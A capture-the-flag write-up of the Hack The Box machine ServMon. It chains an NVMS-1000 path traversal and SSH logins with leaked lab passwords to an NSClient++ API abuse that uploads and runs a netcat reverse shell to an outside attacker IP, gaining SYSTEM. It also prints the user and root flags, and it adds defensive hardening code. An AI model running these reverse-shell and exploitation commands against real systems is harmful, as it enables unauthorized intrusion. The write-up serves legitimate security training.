Hack The Box Write-Up ServMon - 10.10.10.184
Monitoring is not protection.

This post is a write-up of the machine ServMon from Hack The Box. Hack The Box is an online platform for training your ethical hacking and penetration testing skills.

ServMon is an ‘Easy’ rated box. Submitting the user.txt flag raises your points by 10 and submitting the root flag raises them by 20.

Foothold

After the port scan, I found some interesting open ports: 21/tcp (FTP), 80/tcp (HTTP) and 8443/tcp (alt-HTTPS). Anonymous FTP login is allowed, and through FTP I found in the folder of Nathan a txt-file with the message that a passwords.txt file is placed on his Desktop. Then I checked the service on the HTTP port, and it turned out that the NVMS-1000 software has a Path Traversal vulnerability.

User

Through the Path Traversal vulnerability, I was able to read the passwords.txt file from Nathan's Desktop, establish an SSH connection with the user account of Nadine and grab the user flag.

Root

I checked port 8443/tcp and found that NSClient++ is running on this box. After checking the version of NSClient++, I found that there is a known vulnerability for this particular version. Through the API I was able to put a revshell.bat in the scripts folder and execute this file. The reverse shell was established with Local System privileges.

# Recon

## Port scan with Nmap

```
nmap -sC -sV -oA ./nmap/servmon.txt 10.10.10.184
```

The results of the port scan.

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 15:14 EDT
Nmap scan report for 10.10.10.184
Host is up (0.063s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
(raw service fingerprint data for ports 80 and 8443 omitted)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m29s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-11T19:19:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.74 seconds
```

There are some interesting ports open:

1. 21/tcp (FTP)
2. 22/tcp (SSH)
3. 80/tcp (HTTP)
4. 8443/tcp (alternative HTTPS)

Let’s go for the low hanging fruit first. Anonymous access for FTP is allowed, so let’s check that first and log in directly as anonymous with the default password anonymous.

```
~$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
```

Let’s poke around a bit.

```
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
```

I got two user folders, Nadine and Nathan. From the directory Nadine I downloaded a file called Confidential.txt and from the folder of Nathan I downloaded the file Notes to do.txt.

Confidential.txt
This file contains a note to Nathan saying that a Passwords.txt file was left on his Desktop. Furthermore, the note refers to some secure folder.

```
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards
```


Notes to do.txt
This is an unfinished to-do list of Nathan.

```
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
```

There are no more files for now, so let’s check the other open ports.

## NVMS-1000

The next port in the enumeration phase is the HTTP port. I visited the webpage http://10.10.10.184 and landed on the login page of NVMS-1000. This web server is hosting Network Surveillance Management Software: NVMS-1000 is a monitoring client specially designed for network video surveillance.

Maybe I have already found the name of this box: ServMon, Server Monitoring?

I tried some default username and password combinations, but they did not work. After some searching on the internet I found that a specific version of NVMS-1000 is vulnerable to Directory Traversal according to this article: https://www.exploit-db.com/exploits/47774. CVE-2019-20085 was assigned to this vulnerability.

I checked this with Burp Suite and found that this NVMS-1000 is indeed vulnerable to a directory traversal attack. I tried to read /windows/win.ini, and every time the GET request failed I added an extra /../ to the path.
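The root cause of a traversal like this is a server that joins the request path onto its web root without confining the result. The Python below is an added example (not code from the post or from the NVMS-1000 vendor) that contrasts a reconstructed naive join with a resolver that decodes once, normalises and refuses anything outside the web root; the web root path and the request paths are assumed, constructed values.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical web root of an NVMS-1000 style HTTP server (assumed value).
WEB_ROOT = "/opt/nvms/www"

def vulnerable_resolve(url_path: str) -> str:
    """Naive join, reconstructed to show the bug: the decoded request path is
    glued onto the web root and handed to the filesystem, which follows every
    '..' segment. Enough '../' therefore walk out of the web root."""
    return posixpath.normpath(WEB_ROOT + "/" + unquote(url_path))

def safe_resolve(url_path: str):
    """Decode once, normalise, then refuse anything outside the web root.
    Returns the on-disk path, or None when the request must get a 403/404."""
    decoded = unquote(url_path)           # decode exactly once ('%2e%2e' -> '..')
    if "\x00" in decoded:                 # a NUL byte would truncate the path in C
        return None
    decoded = decoded.replace("\\", "/")  # Windows treats '\' as a separator too
    candidate = posixpath.normpath(WEB_ROOT + "/" + decoded)
    # After '..' resolution the result must be the root itself or sit below it.
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate

def compare(url_path: str):
    """(what the naive server would open, what the hardened one would open)"""
    return vulnerable_resolve(url_path), safe_resolve(url_path)

if __name__ == "__main__":
    # Constructed request paths: a normal page and the traversal shapes the
    # write-up tried (plain, URL-encoded and backslash variants).
    for p in ("/Pages/login.htm", "/../../../windows/win.ini",
              "/..%2f..%2f..%2fwindows/win.ini", "/..\\..\\..\\windows\\win.ini"):
        print(p, "->", compare(p))
```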

Ok, now I need to put the pieces together.

# Intrusion

I know that there is a file called passwords.txt on the Desktop of Nathan. As NVMS-1000 has a Path Traversal vulnerability, I can read that file and grab the passwords.

I now have a list of passwords. I placed all of these passwords in a file called passwords.txt.

```
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
[email protected]
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
```

As the SSH port is open, I first tried to get an SSH shell as the user Nathan, but none of the passwords work for his account. Then I switched to the user account Nadine and managed to get a shell with the password [email protected]. I grabbed the user flag and can go to the next step: privilege escalation.

```
~$ ssh [email protected]
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

[email protected] C:\Users\Nadine>cd Desktop

[email protected] C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
15/04/2020  20:51                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,418,095,616 bytes free

[email protected] C:\Users\Nadine\Desktop>type user.txt
7f26c77e1ccd17cede33c1b950c26e4e

[email protected] C:\Users\Nadine\Desktop>
```

# Privilege Escalation

## Enumeration

There is a non-default port open on this box: port 8443/tcp (alt-https). When I visited this web page through the URL https://10.10.10.184:8443, I landed on the Sign In page of NSClient++. I tried to log in with the passwords I already knew, but none of them worked. They all resulted in a "403 Your not allowed" response.

I already have an active SSH session with the user account Nadine. Let’s find out which version of NSClient++ this box is running, and I also need to find the password. On the NSClient++ documentation website (https://docs.nsclient.org/) I found how I can grab the web administrator password.

```
[email protected] C:\Users\Nadine>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine> cd 'C:\Program Files\NSClient++\'
PS C:\Program Files\NSClient++> .\nscp.exe web password --display
Current password: ew2x6SsGTxjRwXOT
```

So, the password is ew2x6SsGTxjRwXOT. With the command below I can check the currently installed version of NSClient++.

```
PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
```

I know that this box is running NSClient++, and I know the password and the version of this software. This has to be the way to root this box. Through searchsploit, I checked whether there is a known vulnerability for this version of NSClient++, and that seems to be the case.

```
~$ searchsploit nsclient++
------------------------------------------------ ----------------------------------------
 Exploit Title                                  |  Path
                                                | (/usr/share/exploitdb/)
------------------------------------------------ ----------------------------------------
NSClient++ 0.5.2.35 - Privilege Escalation      | exploits/windows/local/46802.txt
------------------------------------------------ ----------------------------------------
Shellcodes: No Result
```

On this exploit-db page, https://www.exploit-db.com/exploits/46802, there is an explanation of how to get a reverse shell with Local System privileges.

# Exploitation

## NSClient++

I found out there are two ways to root this box:

1. Through the GUI
2. Through the API

I’m new to APIs and I want to learn something, so I chose the API way, in my opinion the easiest way to root this box. I checked the API documentation of NSClient++ for the commands. I started by removing the curl alias in PowerShell, because it refers to the Invoke-WebRequest cmdlet and I do not want to use this cmdlet.

```
PS C:\Program Files\NSClient++> Remove-Item alias:curl
```

First, I checked whether I can call the API through the SSH session of Nadine. And it worked.

```
PS C:\Users\Nadine> curl -k -u admin https://localhost:8443/api/v1
Enter host password for user 'admin':
{"info_url":"https://localhost:8443/api/v1/info","logs_url":"https://localhost:8443/api/v1/logs","modules_url":"https://localhost:8443/api/v1/modules","queries_url":"https://localhost:8443/api/v1/queries","scripts_url":"https://localhost:8443/api/v1/scripts"}
```

As CheckExternalScripts and Scheduler are already enabled, I only have to place the script in the C:\Program Files\NSClient++\Scripts directory through the API and run it. I invoked the command below and placed a reverse shell script named revshell.bat. Of course, I placed the nc.exe file in the C:\Temp directory beforehand.

```
curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.42 4444 -e cmd.exe"
```

With this command I call the script.

```
curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m
```

The reverse shell is established and I can now grab the root flag.

```
~$ nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50184.
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\Administrator\Desktop\root.txt"
d3d0930a47b35c8ae6ff3689411bf7ad

C:\Program Files\NSClient++>
```
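The escalation above depends on three things being true at once: the web API is enabled, CheckExternalScripts is enabled so the API can add and run scripts as the service account, and the admin password sits in nsclient.ini where a local user can read it. The Python below is an added example (not code from the post or from the NSClient++ project) that audits an nsclient.ini for exactly those settings; the file content is a constructed sample that follows NSClient++'s section and key layout, and the "unrestricted hosts" test is a simplified heuristic.

```python
import configparser

# Constructed nsclient.ini fragment in the state the write-up relies on: web API
# on, external scripts and scheduler on, plaintext password in the file. The
# section and key names follow NSClient++'s layout; the values are made up.
EXPOSED_INI = """[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1,::1
password = PLACEHOLDER-not-the-real-one

[/settings/external scripts]
allow arguments = true
"""

def load_nsclient_ini(text: str) -> configparser.ConfigParser:
    # NSClient++ section names start with '/'; configparser takes them verbatim.
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as NSClient++ writes it
    cp.read_string(text)
    return cp

def _on(cp, section: str, key: str) -> bool:
    value = cp.get(section, key, fallback="disabled").strip().lower()
    return value in ("enabled", "true", "1")

def audit_nsclient(text: str) -> list:
    """Return short tags for the risky settings found, in check order."""
    cp = load_nsclient_ini(text)
    findings = []
    web = _on(cp, "/modules", "WEBServer")
    ext = _on(cp, "/modules", "CheckExternalScripts")
    if web and ext:   # the combination the write-up's escalation used
        findings.append("web-api-can-add-scripts")
    if _on(cp, "/modules", "Scheduler") and ext:
        findings.append("scheduler-runs-external-scripts")
    hosts = cp.get("/settings/default", "allowed hosts", fallback="").strip()
    if not hosts or "0.0.0.0/0" in hosts or "::/0" in hosts:  # simplified check
        findings.append("allowed-hosts-unrestricted")
    if cp.get("/settings/default", "password", fallback="").strip():
        findings.append("plaintext-password-in-ini")  # lock down the file ACL
    if _on(cp, "/settings/external scripts", "allow arguments"):
        findings.append("external-script-arguments-allowed")
    return findings
```

Disabling CheckExternalScripts (or the web server) when they are not needed removes the first two findings; the password finding stays until the ini's ACL keeps non-administrators from reading it.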

Thanks for reading this write-up! Did you enjoy reading it, or did you learn something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)